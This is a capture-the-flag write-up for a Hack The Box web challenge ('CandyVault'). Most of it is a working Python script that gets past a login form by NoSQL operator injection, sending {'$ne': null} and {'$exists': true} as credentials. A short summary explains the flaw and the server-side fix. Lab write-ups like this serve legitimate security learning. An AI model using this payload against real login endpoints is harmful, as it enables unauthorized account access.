https://app.hackthebox.com/challenges/624

Description

The malevolent spirits have concealed all the Halloween treats within their secret vault, and it’s imperative that you decipher its enigmatic seal to reclaim the candy before the spooky night arrives.

Exploitation

#!/usr/bin/python3
from requests.exceptions import ConnectionError
import requests,json,sys

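def get_base_url():
    """Build the target base URL from the single ``<ip:port>`` argument.

    Prints the usage line and exits with status 1 when the argument is
    missing or is not exactly one non-empty host and a numeric port
    separated by a single colon. The original unpacking raised an
    unhandled ValueError on input such as ``host`` or ``a:b:c``.

    Returns:
        str: ``http://<host>:<port>`` with no trailing slash.
    """
    usage = f"Usage: {sys.argv[0]} <ip:port>"
    if len(sys.argv) != 2:
        print(usage)
        sys.exit(1)

    pieces = sys.argv[1].split(":")
    # Exactly two pieces means exactly one colon; anything else is not ip:port.
    if len(pieces) != 2 or not pieces[0] or not pieces[1].isdigit():
        print(usage)
        sys.exit(1)

    host, port = pieces
    return f"http://{host}:{port}"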

def attempt_login(payload):
    """POST ``payload`` as JSON to the login URL and follow one redirect by hand.

    Automatic redirects are disabled so the ``Location`` returned by the
    login endpoint stays visible to the caller. The exchange is tried up to
    three times; an attempt that raises ``ConnectionError`` (the
    ``requests.exceptions`` class imported at the top of the file) is
    dropped silently and the next attempt starts.

    Args:
        payload: JSON-serialisable request body.

    Returns:
        tuple: ``(response, final_url)`` when the login response redirected
        and the target was fetched, ``(response, None)`` when it did not
        redirect, ``(None, None)`` when all three attempts failed to connect.
    """
    for _attempt in range(3):
        try:
            login_response = session.post(
                login_url,
                headers=headers,
                json=payload,
                allow_redirects=False,
            )
            if not login_response.is_redirect:
                return login_response, None

            target = login_response.headers.get("Location")
            # Only root-relative targets are resolved against the base URL;
            # any other Location value is requested exactly as received.
            if target.startswith("/"):
                target = base_url + target
            landing_page = session.get(target, headers=headers)
            return landing_page, target
        except ConnectionError:
            continue
    return None, None

def attack():
    """Send each candidate body and print the first page that is not the login form.

    Returns after the first hit. Prints nothing when no candidate produces a
    page without the login banner.
    """
    login_banner = "Log-in to open the doors to candy vault!"
    for candidate in payloads:
        response, _redirect_target = attempt_login(candidate)
        # Truthiness, not an `is None` test: a requests Response is also
        # falsy for 4xx/5xx statuses, so error pages are skipped here too.
        if not response:
            continue
        if login_banner in response.text:
            continue
        print(response.text)
        return
        
# Endpoints are derived from the <ip:port> command-line argument.
base_url = get_base_url()
login_url = f"{base_url}/login"
headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0",
}
session = requests.Session()

# Both fields carry a query-operator object where a login form would send a
# string. If the server places these values into a MongoDB-style filter
# unchanged, "$ne": null and "$exists": true match a stored account without
# any credential being known. A handler that accepts only string values for
# email and password rejects this body.
payloads = [
    {
        "email": {"$ne": None},
        "password": {"$exists": True},
    },
]
attack()

Summary

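CandyVault: the script above involves no cryptography. It gets past the login form by sending JSON objects instead of strings for `email` and `password` (`{"$ne": null}` and `{"$exists": true}`), then prints the page returned after the redirect. That this works suggests the login handler passes the request body straight into a MongoDB-style query, where the operators match a stored account without valid credentials. The server-side fix is to accept only string values for both fields, rejecting or casting anything else, before the query is built.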